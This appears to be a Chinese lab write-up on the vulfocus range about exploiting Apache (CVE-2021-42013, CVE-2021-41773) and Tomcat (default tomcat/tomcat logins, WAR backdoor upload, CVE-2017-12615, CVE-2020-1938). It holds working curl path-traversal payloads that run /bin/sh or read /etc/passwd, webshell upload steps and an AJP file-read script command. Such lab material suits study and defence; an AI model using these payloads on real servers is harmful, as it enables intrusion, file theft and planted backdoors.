中间件安全(apache、tomcat)

靶场:

vulfocus

Apache

Apache HTTP Server 是美国阿帕奇( Apache )基金会的一款开源网页服务器。该服务器具有快速、可靠且可通过简单的API进行扩充的特点,发现 Apache HTTP Server 2.4.50 中针对 CVE - 2021 - 41773 的修复不够充分。攻击者可以使用路径遍历攻击将 URL 映射到由类似别名的指令配置的目录之外的文件。如果这些目录之外的文件不受通常的默认配置"要求全部拒绝"的保护,则这些请求可能会成功。如果还为这些别名路径启用了 CGI 脚本,则这可能允许远程代码执行。此问题仅影响 Apache 2.4.49 和 Apache 2.4.50 ,而不影响更早版本。

CVE-2021-42013(RCE)

利用:

方式一:

curl --data "echo;id" 'http://192.168.222.8:54778//cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'

id就是我们要执行的命令

方式二:

直接以post方式提交数据包。数据就是要执行的命令。

POST /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh

通过执行命令我们也可以反弹shell。

CVE-2021-41773(目录穿越)

Apache HTTP Server 2.4.49、2.4.50版本对路径规范化所做的更改中存在一个路径穿越漏洞,攻击者可利用该漏洞读取到Web目录外的其他文件,如系统配置文件、网站源码等,甚至在特定情况下,攻击者可构造恶意请求执行命令,控制服务器。

利用:

方式一:
curl - v -- path - as - is

'http://xx.xx.xx.xx/icons/../../../../etc/passwd' 读取etc.passwd文件

成功读取/etc/passwd文件内容:

方式二:

利用BP直接发送数据包:

Tomcat

弱口令

这里有个后台管理功能,我们可以弱口令或者爆破进入后台。(默认:tomcat tomcat)

在后台有一个上传文件的功能。

我们可以生成一个jsp后门代码(1.jsp),然后压缩成war文件(1.war)。

CVE-2017-12615(文件上传)

Tomcat 是一个小型的轻量级应用服务器,在中小型系统和并发访问用户不是很多的场合下被普遍使用,是开发和调试JSP 程序的首选。 攻击者将有可能可通过精心构造的攻击请求数据包向服务器上传包含任意代码的 JSP 的webshell文件,JSP文件中的恶意代码将能被服务器执行,导致服务器上的数据泄露或获取服务器权限。

影响版本:Apache Tomcat 7.0.0 - 7.0.79

利用:

直接抓取数据包,然后以PUT形式提交数据包(数据包可以是一个后门代码)

发送该数据包之后就会创建一个1.jsp文件。

CVE-2020-1938(文件包含)

Apache Tomcat AJP协议(默认 8009 端口)由于存在实现缺陷导致相关参数可控,攻击者利用该漏洞可通过构造特定参数,读取服务器webapp目录下的任意文件。若服务器端同时存在文件上传功能,攻击者可进一步结合文件包含实现远程代码的执行。

漏洞影响的产品版本包括:

Tomcat 6.*

Tomcat 7.* < 7.0.100

Tomcat 8.* < 8.5.51

Tomcat 9.* < 9.0.31

利用:
脚本:https :// github . com / YDHCUI / CNVD - 2020 - 10487 - Tomcat - Ajp - lfi

python .\CNVD-2020-10487-Tomcat-Ajp-lfi.py 47.98.193.176 -p 35839 -f WEB-INF/web.xml

使用python2

相关推荐
guslegend36 分钟前
3月29日(openclaw安全保障)
人工智能·安全·大模型
桌面运维家39 分钟前
Nginx服务器安全:高级访问控制与流量清洗实战
服务器·nginx·安全
AI周红伟1 小时前
周红伟:关于OpenClaw安全使用提醒
大数据·数据库·人工智能·安全·腾讯云·openclaw
不灭锦鲤1 小时前
网络安全学习第162天
学习·安全·web安全
marsh02061 小时前
23 openclaw防止SQL注入:参数化查询与ORM安全使用
数据库·sql·安全·ai·编程·技术
努力的lpp2 小时前
小迪安全第9天:算法逆向与加密解密基础
安全
m0_738120722 小时前
渗透测试——Ripper靶机详细横向渗透过程(rips扫描文件,水平横向越权,Webmin直接获取root权限)
linux·网络·数据库·安全·web安全·php
QCzblack2 小时前
知识点回顾
安全
ShineWinsu2 小时前
MySQL安全加固十大硬核操作:硬核防护指南
数据库·mysql·安全